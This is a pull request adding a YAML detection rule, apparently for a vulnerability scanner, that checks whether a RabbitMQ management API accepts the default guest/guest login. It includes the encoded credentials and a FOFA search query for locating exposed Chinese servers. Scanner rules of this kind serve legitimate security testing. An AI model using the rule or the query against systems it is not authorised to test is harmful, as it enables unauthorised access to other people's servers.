### PR TITLE
add rabbitmq-default-password

### DIFF
--- a/pocs/rabbitmq-default-password.yml
+++ b/pocs/rabbitmq-default-password.yml
@@ -1,0 +1,16 @@
+name: poc-yaml-rabbitmq-default-password
+rules:
+  - method: GET
+    path: /api/whoami
+    expression: |
+      response.status == 401
+  - method: GET
+    path: /api/whoami
+    headers:
+      Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
+    expression: |
+      response.status == 200 && response.body.bcontains(b"\"name\":\"guest\"")
+detail:
+  author: mumu0215(https://github.com/mumu0215)
+  links:
+    - http://luckyzmj.cn/posts/15dff4d3.html


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
RabbitMQ默认账户guest/guest登录漏洞

## 测试环境
fofa关键字：
app="RabbitMQ" && country="CN"

## 备注
<img width="610" alt="Snipaste_2021-05-06_13-17-00" src="https://user-images.githubusercontent.com/40090857/117245379-5d01cf00-ae6d-11eb-9734-8831a7f57258.png">

